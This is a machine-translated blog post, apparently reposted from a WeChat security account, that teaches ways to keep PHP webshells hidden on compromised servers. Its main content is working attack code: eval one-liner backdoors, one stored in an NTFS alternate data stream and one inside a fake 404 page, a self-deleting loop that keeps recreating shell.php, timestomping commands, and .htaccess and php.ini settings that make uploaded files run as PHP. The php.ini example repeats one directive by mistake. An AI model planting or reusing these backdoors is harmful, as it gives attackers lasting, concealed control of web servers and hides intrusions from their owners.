当前位置:网站首页>PHP backdoor hiding skills
PHP backdoor hiding skills
2020-11-06 22:33:00 【Official account Bypass】
If you want your own Webshell Stay longer , except Webshell Don't kill , There are also some hidden techniques to be aware of , Like hiding files , Modify time properties , Hide file contents, etc .
1、 Hidden files
Use Attrib +s +a +h +r The command is to add system file properties to the original folder 、 Archive properties 、 Read only file properties and hidden file properties .
attrib +s +a +h +r shell.php // hide shell.php file
2、 Modify the file time attribute
When you try to hide your newly created files in a bunch of files , that , In addition to creating a confusing file name , You also need to change the revision date of the file .
// Modification time modification
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
// The visit time was modified
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
// Creation time modification
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
Use the command to get the file properties
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
Modify the creation and modification time of all files in a folder
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、 utilize ADS Hide file content
On the server echo A data stream file goes in , such as index.php It's a normal web page file , We can do it like this :
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
This creates an invisible shell hidden.jpg, Regular file manager 、type command ,dir command 、del The order couldn't find that hidden.jpg Of .
utilize include function , take index.php:hidden.jpg Conduct hex code , Put this ADS file include go in , In this way, we can analyze our sentence normally .
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、 The undead horse
The undead horse will delete itself , Loop to create hidden backdoors in the form of processes .
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); // Delete yourself
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // establish shell.php, It's better to use the sentence of no killing here
sleep(10); // Time interval between
}
?>
The simplest and most effective way to deal with it , Restart the service and delete it webshell file .
5、 Middleware back door
Will be compiled so File copy to modules Folder , Start the back door module , restart Apache. When sending a string past for a specific parameter , Can trigger the back door .
github Project address :
https://github.com/VladRico/apache2_BackdoorMod
6、 utilize 404 Page hidden back door
404 The page is mainly used to enhance the user experience , Can be used to hide backdoor files .
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
7、 utilize .htaccess Document composition PHP back door
commonly .htaccess It can be used to leave backdoors and bypass blacklists , Create... In the upload directory .htaccess File is written to , It doesn't need to be restarted to take effect , Upload png File parsing .
AddType application/x-httpd-php .png
in addition , stay .htaccess Join in php Parsing rules , Include the file name with 1 Analysis into php, Upload 1.txt It can be parsed .
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8、 utilize php.ini Hide backdoor files
php.ini You can specify the name of the file that will be automatically resolved before and after the execution of the main file , Commonly used in the common header and tail of a page , It can also be used to hide php back door .
; stay PHP Automatically add files before documents .
auto_prepend_file = "c:\tmp.txt"
; stay PHP Automatically add files after the document .
auto_prepend_file = "c:\tmp.txt"
Need to restart the service to take effect , Visit any one of php File is available webshell.
This article is from WeChat official account. - Bypass(Bypass--).
If there is any infringement , Please contact the [email protected] Delete .
Participation of this paper “OSC Source creation plan ”, You are welcome to join us , share .
版权声明
本文为[Official account Bypass]所创,转载请带上原文链接,感谢
边栏推荐
- Git SSH bad permissions
- 甘特图对活动进行分组教程
- September 3, 2020: naked writing algorithm: loop matrix traversal.
- September 9, 2020: naked writing algorithm: two threads print numbers 1-100 in turn.
- Application insights application insights use application maps to build request link views
- JS array the usage of array is all here (array method reconstruction, array traversal, array de duplication, array judgment and conversion)
- Countdown | 2020 PostgreSQL Asia Conference - agenda arrangement of Chinese sub Forum
- The essence of transaction and the principle of deadlock
- Logo design company, Nanjing
- Summary of common SQL statements
猜你喜欢
Git remote library rollback specified version
2020 database technology conference helps technology upgrade
测试攻城狮必备技能点!一文带你解读DevOps下的测试技术
ImageMagick - add watermark
Jenkins入门(二)声明式流水线Jenkins Pipeline
Common syntax corresponding table of mongodb and SQL
Js数组-数组的用法全在这里(数组方法的重构、数组的遍历、数组的去重,数组的判断与转换)
How does LeadTools detect, read and write barcodes
August 30, 2020: naked write algorithm: the nearest common ancestor of two nodes in a binary tree.
In 2020, how can wechat seal numbers be quickly lifted?
随机推荐
10000! Ideal car recalls all defective cars: 97 accidents have occurred and losses will be expanded
小程序商城系统插件代码该如何写?怎么用代码检查添加插件是否成功?
2020 database technology conference helps technology upgrade
超高频RFID医疗血液管理系统应用
Stm32f030f4p6 compatible with smart micro mm32f031f4p6
August 24, 2020: what are small documents? What's wrong with a lot of small files? How to solve many small files? (big data)
汽车维修app开发的好处与功能
Code generator plug-in and creator preform file analysis
JVM memory allocation - xms128m - xmx512m - XX: permsize = 128M - XX: maxpermsize = 512M
Epu360: all the H5 templates you want are here, e-book, big turntable, red envelope rain, questionnaire survey
JS string - string string object method
JVM class loading mechanism
Method of code refactoring -- Analysis of method refactoring
WebAPI接口设计:SwaggerUI文档 / 统一响应格式 / 统一异常处理 / 统一权限验证
Es create a new index database and copy the old index library, practice pro test effective!
Exclusive interview of guests at | 2020 PostgreSQL Asia Conference: Wang Tao
实验一
打工人好物——磨炼钢铁意志就要这样高效的电脑
Event monitoring problem
Count the number of project code lines